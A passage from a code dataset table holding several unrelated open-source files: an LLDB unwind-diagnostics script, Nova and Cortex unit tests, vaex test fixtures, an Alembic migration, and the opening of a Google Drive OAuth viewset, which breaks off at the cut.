text stringlengths 4 1.02M | meta dict |
|---|---|
from __future__ import print_function
import optparse
import lldb
import re
import shlex
# Print the frame number, pc, frame pointer, module UUID and function name
# Returns the SBModule that contains the PC, if it could be found
def backtrace_print_frame(target, frame_num, addr, fp):
process = target.GetProcess()
addr_for_printing = addr
addr_width = process.GetAddressByteSize() * 2
if frame_num > 0:
addr = addr - 1
sbaddr = lldb.SBAddress()
try:
sbaddr.SetLoadAddress(addr, target)
module_description = ""
if sbaddr.GetModule():
module_filename = ""
module_uuid_str = sbaddr.GetModule().GetUUIDString()
if module_uuid_str is None:
module_uuid_str = ""
if sbaddr.GetModule().GetFileSpec():
module_filename = sbaddr.GetModule().GetFileSpec().GetFilename()
if module_filename is None:
module_filename = ""
if module_uuid_str != "" or module_filename != "":
module_description = '%s %s' % (
module_filename, module_uuid_str)
except Exception:
print('%2d: pc==0x%-*x fp==0x%-*x' % (frame_num, addr_width, addr_for_printing, addr_width, fp))
return
sym_ctx = target.ResolveSymbolContextForAddress(
sbaddr, lldb.eSymbolContextEverything)
if sym_ctx.IsValid() and sym_ctx.GetSymbol().IsValid():
function_start = sym_ctx.GetSymbol().GetStartAddress().GetLoadAddress(target)
offset = addr - function_start
print('%2d: pc==0x%-*x fp==0x%-*x %s %s + %d' % (frame_num, addr_width, addr_for_printing, addr_width, fp, module_description, sym_ctx.GetSymbol().GetName(), offset))
else:
print('%2d: pc==0x%-*x fp==0x%-*x %s' % (frame_num, addr_width, addr_for_printing, addr_width, fp, module_description))
return sbaddr.GetModule()
# A simple stack walk algorithm that follows the frame chain.
# Returns a two-element list; the first element is a list of modules
# seen and the second element is a list of addresses seen during the backtrace.
def simple_backtrace(debugger):
target = debugger.GetSelectedTarget()
process = target.GetProcess()
cur_thread = process.GetSelectedThread()
initial_fp = cur_thread.GetFrameAtIndex(0).GetFP()
# If the pseudoreg "fp" isn't recognized, on arm hardcode to r7 which is
# correct for Darwin programs.
if initial_fp == lldb.LLDB_INVALID_ADDRESS and target.triple[0:3] == "arm":
for reggroup in cur_thread.GetFrameAtIndex(1).registers:
if reggroup.GetName() == "General Purpose Registers":
for reg in reggroup:
if reg.GetName() == "r7":
initial_fp = int(reg.GetValue(), 16)
module_list = []
address_list = [cur_thread.GetFrameAtIndex(0).GetPC()]
this_module = backtrace_print_frame(
target, 0, cur_thread.GetFrameAtIndex(0).GetPC(), initial_fp)
print_stack_frame(process, initial_fp)
print("")
if this_module is not None:
module_list.append(this_module)
if cur_thread.GetNumFrames() < 2:
return [module_list, address_list]
cur_fp = process.ReadPointerFromMemory(initial_fp, lldb.SBError())
cur_pc = process.ReadPointerFromMemory(
initial_fp + process.GetAddressByteSize(), lldb.SBError())
frame_num = 1
while cur_pc != 0 and cur_fp != 0 and cur_pc != lldb.LLDB_INVALID_ADDRESS and cur_fp != lldb.LLDB_INVALID_ADDRESS:
address_list.append(cur_pc)
this_module = backtrace_print_frame(target, frame_num, cur_pc, cur_fp)
print_stack_frame(process, cur_fp)
print("")
if this_module is not None:
module_list.append(this_module)
frame_num = frame_num + 1
next_pc = 0
next_fp = 0
if target.triple[
0:6] == "x86_64" or target.triple[
0:4] == "i386" or target.triple[
0:3] == "arm":
error = lldb.SBError()
next_pc = process.ReadPointerFromMemory(
cur_fp + process.GetAddressByteSize(), error)
if not error.Success():
next_pc = 0
next_fp = process.ReadPointerFromMemory(cur_fp, error)
if not error.Success():
next_fp = 0
# Clear the 0th bit for arm frames - this indicates it is a thumb frame
if target.triple[0:3] == "arm" and (next_pc & 1) == 1:
next_pc = next_pc & ~1
cur_pc = next_pc
cur_fp = next_fp
this_module = backtrace_print_frame(target, frame_num, cur_pc, cur_fp)
print_stack_frame(process, cur_fp)
print("")
if this_module is not None:
module_list.append(this_module)
return [module_list, address_list]
def print_stack_frame(process, fp):
if fp == 0 or fp == lldb.LLDB_INVALID_ADDRESS or fp == 1:
return
addr_size = process.GetAddressByteSize()
addr = fp - (2 * addr_size)
i = 0
outline = "Stack frame from $fp-%d: " % (2 * addr_size)
error = lldb.SBError()
try:
while i < 5 and error.Success():
address = process.ReadPointerFromMemory(
addr + (i * addr_size), error)
outline += " 0x%x" % address
i += 1
print(outline)
except Exception:
return
def diagnose_unwind(debugger, command, result, dict):
"""
Gather diagnostic information to help debug incorrect unwind (backtrace)
behavior in lldb. When there is a backtrace that doesn't look
correct, run this command with the correct thread selected and a
large amount of diagnostic information will be printed, it is likely
to be helpful when reporting the problem.
"""
command_args = shlex.split(command)
parser = create_diagnose_unwind_options()
try:
(options, args) = parser.parse_args(command_args)
except:
return
target = debugger.GetSelectedTarget()
if target:
process = target.GetProcess()
if process:
thread = process.GetSelectedThread()
if thread:
lldb_versions_match = re.search(
r'[lL][lL][dD][bB]-(\d+)([.](\d+))?([.](\d+))?',
debugger.GetVersionString())
lldb_version = 0
lldb_minor = 0
if len(lldb_versions_match.groups()
) >= 1 and lldb_versions_match.groups()[0]:
lldb_major = int(lldb_versions_match.groups()[0])
if len(lldb_versions_match.groups()
) >= 5 and lldb_versions_match.groups()[4]:
lldb_minor = int(lldb_versions_match.groups()[4])
modules_seen = []
addresses_seen = []
print('LLDB version %s' % debugger.GetVersionString())
print('Unwind diagnostics for thread %d' % thread.GetIndexID())
print("")
print("=============================================================================================")
print("")
print("OS plugin setting:")
debugger.HandleCommand(
"settings show target.process.python-os-plugin-path")
print("")
print("Live register context:")
thread.SetSelectedFrame(0)
debugger.HandleCommand("register read")
print("")
print("=============================================================================================")
print("")
print("lldb's unwind algorithm:")
print("")
frame_num = 0
for frame in thread.frames:
if not frame.IsInlined():
this_module = backtrace_print_frame(
target, frame_num, frame.GetPC(), frame.GetFP())
print_stack_frame(process, frame.GetFP())
print("")
if this_module is not None:
modules_seen.append(this_module)
addresses_seen.append(frame.GetPC())
frame_num = frame_num + 1
print("")
print("=============================================================================================")
print("")
print("Simple stack walk algorithm:")
print("")
(module_list, address_list) = simple_backtrace(debugger)
if module_list and module_list is not None:
modules_seen += module_list
if address_list and address_list is not None:
addresses_seen = set(addresses_seen)
addresses_seen.update(set(address_list))
print("")
print("=============================================================================================")
print("")
print("Modules seen in stack walks:")
print("")
modules_already_seen = set()
for module in modules_seen:
if module is not None and module.GetFileSpec().GetFilename() is not None:
if not module.GetFileSpec().GetFilename() in modules_already_seen:
debugger.HandleCommand(
'image list %s' %
module.GetFileSpec().GetFilename())
modules_already_seen.add(
module.GetFileSpec().GetFilename())
print("")
print("=============================================================================================")
print("")
print("Disassembly ofaddresses seen in stack walks:")
print("")
additional_addresses_to_disassemble = addresses_seen
for frame in thread.frames:
if not frame.IsInlined():
print("--------------------------------------------------------------------------------------")
print("")
print("Disassembly of %s, frame %d, address 0x%x" % (frame.GetFunctionName(), frame.GetFrameID(), frame.GetPC()))
print("")
if target.triple[
0:6] == "x86_64" or target.triple[
0:4] == "i386":
debugger.HandleCommand(
'disassemble -F att -a 0x%x' % frame.GetPC())
else:
debugger.HandleCommand(
'disassemble -a 0x%x' %
frame.GetPC())
if frame.GetPC() in additional_addresses_to_disassemble:
additional_addresses_to_disassemble.remove(
frame.GetPC())
for address in list(additional_addresses_to_disassemble):
print("--------------------------------------------------------------------------------------")
print("")
print("Disassembly of 0x%x" % address)
print("")
if target.triple[
0:6] == "x86_64" or target.triple[
0:4] == "i386":
debugger.HandleCommand(
'disassemble -F att -a 0x%x' % address)
else:
debugger.HandleCommand('disassemble -a 0x%x' % address)
print("")
print("=============================================================================================")
print("")
additional_addresses_to_show_unwind = addresses_seen
for frame in thread.frames:
if not frame.IsInlined():
print("--------------------------------------------------------------------------------------")
print("")
print("Unwind instructions for %s, frame %d" % (frame.GetFunctionName(), frame.GetFrameID()))
print("")
debugger.HandleCommand(
'image show-unwind -a "0x%x"' % frame.GetPC())
if frame.GetPC() in additional_addresses_to_show_unwind:
additional_addresses_to_show_unwind.remove(
frame.GetPC())
for address in list(additional_addresses_to_show_unwind):
print("--------------------------------------------------------------------------------------")
print("")
print("Unwind instructions for 0x%x" % address)
print("")
debugger.HandleCommand(
'image show-unwind -a "0x%x"' % address)
def create_diagnose_unwind_options():
usage = "usage: %prog"
description = '''Print diagnostic information about a thread backtrace which will help to debug unwind problems'''
parser = optparse.OptionParser(
description=description,
prog='diagnose_unwind',
usage=usage)
return parser
lldb.debugger.HandleCommand(
'command script add -f %s.diagnose_unwind diagnose-unwind' %
__name__)
print('The "diagnose-unwind" command has been installed, type "help diagnose-unwind" for detailed help.')
| {
"content_hash": "40edba7b48804d5069fa2b760269b5cb",
"timestamp": "",
"source": "github",
"line_count": 307,
"max_line_length": 174,
"avg_line_length": 44.86644951140065,
"alnum_prop": 0.48874691447655,
"repo_name": "endlessm/chromium-browser",
"id": "db3ff1952f33585bacade73ce9e0c9a2eaebde39",
"size": "14133",
"binary": false,
"copies": "8",
"ref": "refs/heads/master",
"path": "third_party/llvm/lldb/examples/python/diagnose_unwind.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [],
"symlink_target": ""
} |
"""Tests for the compute extra resources framework."""
from oslo.config import cfg
from stevedore import extension
from stevedore import named
from nova.compute import resources
from nova.compute.resources import base
from nova.compute.resources import vcpu
from nova import context
from nova.objects import flavor as flavor_obj
from nova import test
from nova.tests.unit import fake_instance
CONF = cfg.CONF
class FakeResourceHandler(resources.ResourceHandler):
def __init__(self, extensions):
self._mgr = \
named.NamedExtensionManager.make_test_instance(extensions)
class FakeResource(base.Resource):
def __init__(self):
self.total_res = 0
self.used_res = 0
def _get_requested(self, usage):
if 'extra_specs' not in usage:
return
if self.resource_name not in usage['extra_specs']:
return
req = usage['extra_specs'][self.resource_name]
return int(req)
def _get_limit(self, limits):
if self.resource_name not in limits:
return
limit = limits[self.resource_name]
return int(limit)
def reset(self, resources, driver):
self.total_res = 0
self.used_res = 0
def test(self, usage, limits):
requested = self._get_requested(usage)
if not requested:
return
limit = self._get_limit(limits)
if not limit:
return
free = limit - self.used_res
if requested <= free:
return
else:
return ('Free %(free)d < requested %(requested)d ' %
{'free': free, 'requested': requested})
def add_instance(self, usage):
requested = self._get_requested(usage)
if requested:
self.used_res += requested
def remove_instance(self, usage):
requested = self._get_requested(usage)
if requested:
self.used_res -= requested
def write(self, resources):
pass
def report_free(self):
return "Free %s" % (self.total_res - self.used_res)
class ResourceA(FakeResource):
def reset(self, resources, driver):
# ResourceA uses a configuration option
self.total_res = int(CONF.resA)
self.used_res = 0
self.resource_name = 'resource:resA'
def write(self, resources):
resources['resA'] = self.total_res
resources['used_resA'] = self.used_res
class ResourceB(FakeResource):
def reset(self, resources, driver):
# ResourceB uses resource details passed in parameter resources
self.total_res = resources['resB']
self.used_res = 0
self.resource_name = 'resource:resB'
def write(self, resources):
resources['resB'] = self.total_res
resources['used_resB'] = self.used_res
def fake_flavor_obj(**updates):
flavor = flavor_obj.Flavor()
flavor.id = 1
flavor.name = 'fakeflavor'
flavor.memory_mb = 8000
flavor.vcpus = 3
flavor.root_gb = 11
flavor.ephemeral_gb = 4
flavor.swap = 0
flavor.rxtx_factor = 1.0
flavor.vcpu_weight = 1
if updates:
flavor.update(updates)
return flavor
class BaseTestCase(test.TestCase):
def _initialize_used_res_counter(self):
# Initialize the value for the used resource
for ext in self.r_handler._mgr.extensions:
ext.obj.used_res = 0
def setUp(self):
super(BaseTestCase, self).setUp()
# initialize flavors and stub get_by_id to
# get flavors from here
self._flavors = {}
self.ctxt = context.get_admin_context()
# Create a flavor without extra_specs defined
_flavor_id = 1
_flavor = fake_flavor_obj(id=_flavor_id)
self._flavors[_flavor_id] = _flavor
# Create a flavor with extra_specs defined
_flavor_id = 2
requested_resA = 5
requested_resB = 7
requested_resC = 7
_extra_specs = {'resource:resA': requested_resA,
'resource:resB': requested_resB,
'resource:resC': requested_resC}
_flavor = fake_flavor_obj(id=_flavor_id,
extra_specs=_extra_specs)
self._flavors[_flavor_id] = _flavor
# create fake resource extensions and resource handler
_extensions = [
extension.Extension('resA', None, ResourceA, ResourceA()),
extension.Extension('resB', None, ResourceB, ResourceB()),
]
self.r_handler = FakeResourceHandler(_extensions)
# Resources details can be passed to each plugin or can be specified as
# configuration options
driver_resources = {'resB': 5}
CONF.resA = '10'
# initialise the resources
self.r_handler.reset_resources(driver_resources, None)
def test_update_from_instance_with_extra_specs(self):
# Flavor with extra_specs
_flavor_id = 2
sign = 1
self.r_handler.update_from_instance(self._flavors[_flavor_id], sign)
expected_resA = self._flavors[_flavor_id].extra_specs['resource:resA']
expected_resB = self._flavors[_flavor_id].extra_specs['resource:resB']
self.assertEqual(int(expected_resA),
self.r_handler._mgr['resA'].obj.used_res)
self.assertEqual(int(expected_resB),
self.r_handler._mgr['resB'].obj.used_res)
def test_update_from_instance_without_extra_specs(self):
# Flavor id without extra spec
_flavor_id = 1
self._initialize_used_res_counter()
self.r_handler.resource_list = []
sign = 1
self.r_handler.update_from_instance(self._flavors[_flavor_id], sign)
self.assertEqual(0, self.r_handler._mgr['resA'].obj.used_res)
self.assertEqual(0, self.r_handler._mgr['resB'].obj.used_res)
def test_write_resources(self):
self._initialize_used_res_counter()
extra_resources = {}
expected = {'resA': 10, 'used_resA': 0, 'resB': 5, 'used_resB': 0}
self.r_handler.write_resources(extra_resources)
self.assertEqual(expected, extra_resources)
def test_test_resources_without_extra_specs(self):
limits = {}
# Flavor id without extra_specs
flavor = self._flavors[1]
result = self.r_handler.test_resources(flavor, limits)
self.assertEqual([None, None], result)
def test_test_resources_with_limits_for_different_resource(self):
limits = {'resource:resC': 20}
# Flavor id with extra_specs
flavor = self._flavors[2]
result = self.r_handler.test_resources(flavor, limits)
self.assertEqual([None, None], result)
def test_passing_test_resources(self):
limits = {'resource:resA': 10, 'resource:resB': 20}
# Flavor id with extra_specs
flavor = self._flavors[2]
self._initialize_used_res_counter()
result = self.r_handler.test_resources(flavor, limits)
self.assertEqual([None, None], result)
def test_failing_test_resources_for_single_resource(self):
limits = {'resource:resA': 4, 'resource:resB': 20}
# Flavor id with extra_specs
flavor = self._flavors[2]
self._initialize_used_res_counter()
result = self.r_handler.test_resources(flavor, limits)
expected = ['Free 4 < requested 5 ', None]
self.assertEqual(sorted(expected),
sorted(result))
def test_empty_resource_handler(self):
"""An empty resource handler has no resource extensions,
should have no effect, and should raise no exceptions.
"""
empty_r_handler = FakeResourceHandler([])
resources = {}
empty_r_handler.reset_resources(resources, None)
flavor = self._flavors[1]
sign = 1
empty_r_handler.update_from_instance(flavor, sign)
limits = {}
test_result = empty_r_handler.test_resources(flavor, limits)
self.assertEqual([], test_result)
sign = -1
empty_r_handler.update_from_instance(flavor, sign)
extra_resources = {}
expected_extra_resources = extra_resources
empty_r_handler.write_resources(extra_resources)
self.assertEqual(expected_extra_resources, extra_resources)
empty_r_handler.report_free_resources()
def test_vcpu_resource_load(self):
# load the vcpu example
names = ['vcpu']
real_r_handler = resources.ResourceHandler(names)
ext_names = real_r_handler._mgr.names()
self.assertEqual(names, ext_names)
# check the extension loaded is the one we expect
# and an instance of the object has been created
ext = real_r_handler._mgr['vcpu']
self.assertIsInstance(ext.obj, vcpu.VCPU)
class TestVCPU(test.TestCase):
def setUp(self):
super(TestVCPU, self).setUp()
self._vcpu = vcpu.VCPU()
self._vcpu._total = 10
self._vcpu._used = 0
self._flavor = fake_flavor_obj(vcpus=5)
self._big_flavor = fake_flavor_obj(vcpus=20)
self._instance = fake_instance.fake_instance_obj(None)
def test_reset(self):
# set vcpu values to something different to test reset
self._vcpu._total = 10
self._vcpu._used = 5
driver_resources = {'vcpus': 20}
self._vcpu.reset(driver_resources, None)
self.assertEqual(20, self._vcpu._total)
self.assertEqual(0, self._vcpu._used)
def test_add_and_remove_instance(self):
self._vcpu.add_instance(self._flavor)
self.assertEqual(10, self._vcpu._total)
self.assertEqual(5, self._vcpu._used)
self._vcpu.remove_instance(self._flavor)
self.assertEqual(10, self._vcpu._total)
self.assertEqual(0, self._vcpu._used)
def test_test_pass_limited(self):
result = self._vcpu.test(self._flavor, {'vcpu': 10})
self.assertIsNone(result, 'vcpu test failed when it should pass')
def test_test_pass_unlimited(self):
result = self._vcpu.test(self._big_flavor, {})
self.assertIsNone(result, 'vcpu test failed when it should pass')
def test_test_fail(self):
result = self._vcpu.test(self._flavor, {'vcpu': 2})
expected = 'Free CPUs 2.00 VCPUs < requested 5 VCPUs'
self.assertEqual(expected, result)
def test_write(self):
resources = {'stats': {}}
self._vcpu.write(resources)
expected = {
'vcpus': 10,
'vcpus_used': 0,
'stats': {
'num_vcpus': 10,
'num_vcpus_used': 0
}
}
self.assertEqual(sorted(expected),
sorted(resources))
| {
"content_hash": "a02da68f6bf7b87708e6f73c1ac7a8e2",
"timestamp": "",
"source": "github",
"line_count": 328,
"max_line_length": 79,
"avg_line_length": 32.85670731707317,
"alnum_prop": 0.6061983854504964,
"repo_name": "mgagne/nova",
"id": "bf3d6349833a4d6da144176a750d28587946b9dd",
"size": "11438",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "nova/tests/unit/compute/test_resources.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "15421976"
},
{
"name": "Shell",
"bytes": "21612"
}
],
"symlink_target": ""
} |
import pytest
import asyncio
import vaex.jupyter.utils
vaex.jupyter.utils._test_delay = 0.01
@pytest.fixture()
def flush_guard():
assert not vaex.jupyter.utils._debounced_execute_queue, "oops, stuff was left in the queue"
yield
assert not vaex.jupyter.utils._debounced_execute_queue, "oops, stuff was left in the queue, please call flush before ending the test"
# as in https://github.com/erdewit/nest_asyncio/issues/20
@pytest.fixture(scope="session")
def event_loop():
"""Don't close event loop at the end of every function decorated by
@pytest.mark.asyncio
"""
import asyncio
print("CREATE" * 10)
# asyncio.set_event_loop()
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
# vaex.jupyter.utils.main_event_loop = loop
yield loop
loop.close()
@pytest.fixture()
def server_latency(webserver):
try:
webserver._test_latency = 0.1
yield
finally:
webserver._test_latency = None
| {
"content_hash": "dfa6d039465190f56f81603fdb07496d",
"timestamp": "",
"source": "github",
"line_count": 37,
"max_line_length": 137,
"avg_line_length": 26.513513513513512,
"alnum_prop": 0.6880733944954128,
"repo_name": "maartenbreddels/vaex",
"id": "9a2357bbd2f15e5e36cd6c687bee96e29e99fbfd",
"size": "981",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/jupyter/conftest.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "1888"
},
{
"name": "C++",
"bytes": "81166"
},
{
"name": "CSS",
"bytes": "6604"
},
{
"name": "GLSL",
"bytes": "6204"
},
{
"name": "HTML",
"bytes": "177613"
},
{
"name": "JavaScript",
"bytes": "1489136"
},
{
"name": "Makefile",
"bytes": "432"
},
{
"name": "PHP",
"bytes": "33807"
},
{
"name": "Python",
"bytes": "1893232"
},
{
"name": "Shell",
"bytes": "4639"
}
],
"symlink_target": ""
} |
from alembic import op
import sqlalchemy as sa
"""Add Port Profile delete table for UCSM plugin
Revision ID: 203b495958cf
Revises: b29f1026b281
Create Date: 2017-01-03 16:25:03.426346
"""
# revision identifiers, used by Alembic.
revision = '203b495958cf'
down_revision = 'b29f1026b281'
def upgrade():
op.create_table('ml2_ucsm_delete_port_profiles',
sa.Column('profile_id', sa.String(length=64), nullable=False),
sa.Column('device_id', sa.String(length=64), nullable=False),
sa.PrimaryKeyConstraint('profile_id', 'device_id')
)
| {
"content_hash": "bc9ef8417e253b8623d9906c4d960266",
"timestamp": "",
"source": "github",
"line_count": 23,
"max_line_length": 70,
"avg_line_length": 24.652173913043477,
"alnum_prop": 0.708994708994709,
"repo_name": "noironetworks/networking-cisco",
"id": "f9e1f2f7d97034b90133205e7fb16068d41f4812",
"size": "1179",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "networking_cisco/db/migration/alembic_migrations/versions/mitaka/expand/203b495958cf_add_port_profile_delete_table_for_ucsm_.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Mako",
"bytes": "1043"
},
{
"name": "Python",
"bytes": "3635799"
},
{
"name": "Shell",
"bytes": "30511"
}
],
"symlink_target": ""
} |
import os
import math
import unittest
import IECore
import IECoreScene
import imath
class TestTriangulateOp( unittest.TestCase ) :
def testSimple( self ) :
""" Test TriangulateOp with a single polygon"""
verticesPerFace = IECore.IntVectorData()
verticesPerFace.append( 4 )
vertexIds = IECore.IntVectorData()
vertexIds.append( 0 )
vertexIds.append( 1 )
vertexIds.append( 2 )
vertexIds.append( 3 )
P = IECore.V3fVectorData()
P.append( imath.V3f( -1, 0, -1 ) )
P.append( imath.V3f( -1, 0, 1 ) )
P.append( imath.V3f( 1, 0, 1 ) )
P.append( imath.V3f( 1, 0, -1 ) )
m = IECoreScene.MeshPrimitive( verticesPerFace, vertexIds )
m["P"] = IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Vertex, P )
fv = IECore.IntVectorData()
fv.append( 5 )
fv.append( 6 )
fv.append( 7 )
fv.append( 8 )
m["fv"] = IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.FaceVarying, fv )
u = IECore.FloatVectorData()
u.append( 1.0 )
m["u"] = IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Uniform, u )
op = IECoreScene.TriangulateOp()
result = op(
input = m
)
self.assert_( "P" in result )
self.assert_( result.arePrimitiveVariablesValid() )
resultP = result["P"].data
self.assertEqual( len(resultP), 4 )
for i in range(0, 4) :
self.assert_( ( resultP[i] - P[i] ).length() < 0.001 )
self.assertEqual( len(result.vertexIds), 6 )
for faceVertexCount in result.verticesPerFace :
self.assertEqual( faceVertexCount, 3 )
for vId in result.vertexIds:
self.assert_( vId < len(resultP) )
self.assert_( "fv" in result )
fv = result["fv"]
self.assertEqual( len(fv.data), len(result.vertexIds) )
for i in fv.data:
self.assert_( i >= 5 and i <= 8 )
def testQuadrangulatedSphere( self ) :
""" Test TriangulateOp with a quadrangulated poly sphere"""
m = IECore.Reader.create( "test/IECore/data/cobFiles/polySphereQuads.cob").read()
P = m["P"].data
self.assertEqual ( len( m.vertexIds ), 1560 )
op = IECoreScene.TriangulateOp()
result = op(
input = m
)
self.assert_( result.arePrimitiveVariablesValid() )
self.assert_( "P" in result )
resultP = result["P"].data
self.assertEqual( len( resultP ), len( P ) )
for i in range(0, len( resultP ) ) :
self.assert_( ( resultP[i] - P[i] ).length() < 0.001 )
for faceVertexCount in result.verticesPerFace :
self.assertEqual( faceVertexCount, 3 )
for vId in result.vertexIds:
self.assert_( vId < len(resultP) )
self.assertEqual ( len( result.vertexIds ), 2280 )
def testTriangulatedSphere( self ) :
""" Test TriangulateOp with a triangulated poly sphere"""
m = IECore.Reader.create( "test/IECore/data/cobFiles/pSphereShape1.cob").read()
op = IECoreScene.TriangulateOp()
result = op(
input = m
)
self.assert_( result.arePrimitiveVariablesValid() )
# As input was already triangulated, the result should be exactly the same
self.assertEqual( m, result )
def testNonPlanar( self ) :
""" Test TriangulateOp with a nonplanar polygon"""
verticesPerFace = IECore.IntVectorData()
verticesPerFace.append( 4 )
vertexIds = IECore.IntVectorData()
vertexIds.append( 0 )
vertexIds.append( 1 )
vertexIds.append( 2 )
vertexIds.append( 3 )
P = IECore.V3dVectorData()
P.append( imath.V3d( -1, 0, -1 ) )
P.append( imath.V3d( -1, 0, 1 ) )
P.append( imath.V3d( 1, 0, 1 ) )
P.append( imath.V3d( 1, 1, -1 ) )
m = IECoreScene.MeshPrimitive( verticesPerFace, vertexIds )
m["P"] = IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Vertex, P )
op = IECoreScene.TriangulateOp()
op["input"] = m
# Non-planar faces not supported by default
self.assertRaises( RuntimeError, op )
op["throwExceptions"] = False
result = op()
def testConcave( self ) :
""" Test TriangulateOp with a concave polygon"""
verticesPerFace = IECore.IntVectorData()
verticesPerFace.append( 4 )
vertexIds = IECore.IntVectorData()
vertexIds.append( 0 )
vertexIds.append( 1 )
vertexIds.append( 2 )
vertexIds.append( 3 )
P = IECore.V3dVectorData()
P.append( imath.V3d( -1, 0, -1 ) )
P.append( imath.V3d( -1, 0, 1 ) )
P.append( imath.V3d( 1, 0, 1 ) )
P.append( imath.V3d( -0.9, 0, -0.9 ) )
m = IECoreScene.MeshPrimitive( verticesPerFace, vertexIds )
m["P"] = IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Vertex, P )
op = IECoreScene.TriangulateOp()
op["input"] = m
# Concave faces not supported by default
self.assertRaises( RuntimeError, op )
op.parameters()["throwExceptions"] = False
result = op()
def testErrors( self ):
""" Test TriangulateOp with invalid P data """
verticesPerFace = IECore.IntVectorData()
verticesPerFace.append( 4 )
vertexIds = IECore.IntVectorData()
vertexIds.append( 0 )
vertexIds.append( 1 )
vertexIds.append( 2 )
vertexIds.append( 3 )
P = IECore.FloatVectorData()
P.append( 1 )
P.append( 2 )
P.append( 3 )
P.append( 4 )
m = IECoreScene.MeshPrimitive( verticesPerFace, vertexIds )
m["P"] = IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Vertex, P )
op = IECoreScene.TriangulateOp()
op["input"] = m
# FloatVectorData not valid for "P"
self.assertRaises( RuntimeError, op )
def testConstantPrimVars( self ) :
m = IECore.Reader.create( "test/IECore/data/cobFiles/polySphereQuads.cob").read()
m["constantScalar"] = IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Constant, IECore.FloatData( 1 ) )
m["constantArray"] = IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Constant, IECore.StringVectorData( [ "one", "two" ] ) )
result = IECoreScene.TriangulateOp()( input = m )
self.assert_( result.arePrimitiveVariablesValid() )
def testInterpolationShouldntChange( self ) :
m = IECoreScene.MeshPrimitive.createPlane( imath.Box2f( imath.V2f( -1 ), imath.V2f( 1 ) ) )
m.setTopology( m.verticesPerFace, m.vertexIds, "catmullClark" )
IECoreScene.TriangulateOp()( input = m, copyInput = False )
self.assertEqual( m.interpolation, "catmullClark" )
def testFaceVaryingIndices( self ) :
m = IECoreScene.MeshPrimitive.createPlane( imath.Box2f( imath.V2f( -1 ), imath.V2f( 1 ) ) )
m["uv"] = IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.FaceVarying, m["uv"].data, IECore.IntVectorData( [ 0, 3, 1, 2 ] ) )
m2 = IECoreScene.TriangulateOp()( input = m, copyInput = True )
self.assertTrue( m2.arePrimitiveVariablesValid() )
self.assertEqual( m2["uv"].data, m["uv"].data )
self.assertEqual( m2["uv"].indices, IECore.IntVectorData( [ 0, 3, 1, 0, 1, 2 ] ) )
def testUniformIndices( self ) :
m = IECoreScene.MeshPrimitive.createPlane( imath.Box2f( imath.V2f( -4 ), imath.V2f( 4 ) ), divisions = imath.V2i( 2, 2 ) )
m["myString"] = IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Uniform, IECore.StringVectorData( [ "a", "b" ] ), IECore.IntVectorData( [ 1, 0, 0, 1 ] ) )
m2 = IECoreScene.TriangulateOp()( input = m, copyInput = True )
self.assertTrue( m2.arePrimitiveVariablesValid() )
self.assertEqual( m2["myString"].data, m["myString"].data )
self.assertEqual( m2["myString"].indices, IECore.IntVectorData( [ 1, 1, 0, 0, 0, 0, 1, 1 ] ) )
@unittest.skipUnless( os.environ.get("CORTEX_PERFORMANCE_TEST", False), "'CORTEX_PERFORMANCE_TEST' env var not set" )
def testTriangulatePerformance( self ):
for i in range(10):
root = IECoreScene.SceneInterface.create( "/path/to/cache.scc", IECore.IndexedIO.OpenMode.Read )
body = root.scene(['location', 'of', 'object'])
objects = []
for f in range( 850, 1000 ):
objects.append( body.readObject(f / 24.0 ))
timer = IECore.Timer( True, IECore.Timer.Mode.WallClock )
totalNumTriangles = 0
for o in objects:
o = IECoreScene.TriangulateOp()( input = o, throwExceptions = False )
totalNumTriangles += o.numFaces()
t = timer.totalElapsed()
print "=== run {0} ===".format(i)
print "total time: {0}s".format( t )
print "time / object: {0} milliseconds".format( 1000.0 * t / len(objects) )
print "time / triangle: {0} microseconds".format( 1000000.0 * t / totalNumTriangles )
if __name__ == "__main__":
unittest.main()
| {
"content_hash": "abb7bddb252e1de2eec7b925146bdd34",
"timestamp": "",
"source": "github",
"line_count": 289,
"max_line_length": 183,
"avg_line_length": 28.889273356401382,
"alnum_prop": 0.6840340160498263,
"repo_name": "appleseedhq/cortex",
"id": "cff83a44a40ae7d8fbd5e8c523053ee2dfdd61e7",
"size": "10138",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "test/IECoreScene/TriangulateOp.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "1374"
},
{
"name": "C",
"bytes": "66503"
},
{
"name": "C++",
"bytes": "9536541"
},
{
"name": "CMake",
"bytes": "95418"
},
{
"name": "GLSL",
"bytes": "24422"
},
{
"name": "Mathematica",
"bytes": "255937"
},
{
"name": "Objective-C",
"bytes": "2360"
},
{
"name": "Python",
"bytes": "4651272"
},
{
"name": "Tcl",
"bytes": "1796"
}
],
"symlink_target": ""
} |
import httplib2
from apiclient import discovery, errors
from rest_framework.viewsets import ViewSet
from rest_framework.permissions import IsAuthenticated
from rest_framework.response import Response
from rest_framework import status
from csp import settings
from crowdsourcing import models
from apiclient.http import MediaFileUpload
# TODO add support for api ajax calls
class GoogleDriveOauth(ViewSet):
permission_classes = [IsAuthenticated]
def get_flow(self, request):
from oauth2client.client import OAuth2WebServerFlow
